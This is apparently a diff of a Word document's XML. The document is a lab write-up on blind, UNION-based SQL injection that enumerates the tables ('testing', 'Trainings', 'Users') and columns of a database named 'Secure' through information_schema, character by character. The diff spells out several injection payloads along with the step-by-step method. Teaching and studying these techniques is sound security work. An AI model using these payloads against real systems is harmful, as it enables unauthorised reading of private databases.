+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -11418,13 +12349,25 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> will</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> use common sense here to tell whether we have got all the characters of what we are looking for, or there is actually a next character but it is missing in the current candidate charset, which should be a very rare case but if it happens, we will need to expand our charset</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>could</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> use common sense here to tell whether we have got all the characters of what we are looking fo</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>r since the naming of the schema is likely to be human readable</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11513,32 +12456,52 @@
                 <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:t>sqli.py</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and find out </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">the value of </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t>sqli.py</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>)</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> and find out </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">the value of </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>database(), the current database name, to be “Secure”.</w:t>
+              <w:t>database(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>),</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> i.e.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> the current database name, to be “Secure”.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11567,6 +12530,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>3</w:t>
             </w:r>
           </w:p>
@@ -11598,7 +12562,107 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Secure' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11624,7 +12688,127 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,9)=BINARY 'Trainings' and table_name&lt;&gt;'testing' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Secure' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(table_name,1,9)=BINARY 'Trainings' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;&gt;'testing' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11650,7 +12834,147 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL, table_name from information_schema.columns where table_schema='Secure' having substr(table_name,1,5)=BINARY 'Users' and table_name&lt;&gt;'testing' and table_name&lt;&gt;'Trainings' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">='Secure' having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(table_name,1,5)=BINARY 'Users' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">&lt;&gt;'testing' and </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;&gt;'Trainings' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -11675,7 +12999,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>n a), we do the same thing as step 2 to get the first table name of “Secure” from information_schema.</w:t>
+              <w:t xml:space="preserve">n a), we do the same thing as step 2 to get the first table name of “Secure” from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11695,20 +13033,44 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>n b), we try to find the second table name of “Secure”. To do that, we can simply add a condition to only match table name which is not “testing”. This gives us the second table name “Trainings”.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Next in c), we can get the third table name “Users” by guessing table name which is not either “testing” or “Trainings”.</w:t>
+              <w:t>n b), we try to find the second table name of “Secure”. To do that, we can simply add a condition to only match table name</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> which is not “testing”. This gives us the second table name “Trainings”.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Next in c), we can get the third table name “Users” by guessing table name</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> which is not either “testing” or “Trainings”.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -11747,7 +13109,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">It might be the case that we ran out the candidate characters as mentioned in step 2 and we </w:t>
+              <w:t xml:space="preserve">It might be the case that we ran out the candidate characters as mentioned in step 2 </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>but</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> we </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11805,8 +13179,29 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
-            </w:r>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11816,6 +13211,7 @@
               </w:rPr>
               <w:t>column_name</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11825,23 +13221,74 @@
               </w:rPr>
               <w:t xml:space="preserve"> from </w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns where table_name='Users'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> having substr(</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>='Users'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> having </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>substr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11879,6 +13326,7 @@
               </w:rPr>
               <w:t>)=BINARY '</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11888,6 +13336,7 @@
               </w:rPr>
               <w:t>api</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -11920,7 +13369,147 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>' union select NULL,NULL, column_name from information_schema.columns where table_name='Users' having substr(column_name,1,2)=BINARY 'id' and column_name&lt;&gt;'api' limit 1 --+</w:t>
+              <w:t xml:space="preserve">' union select </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>NULL,NULL</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>column_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>information_schema.columns</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> where </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>table_name</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
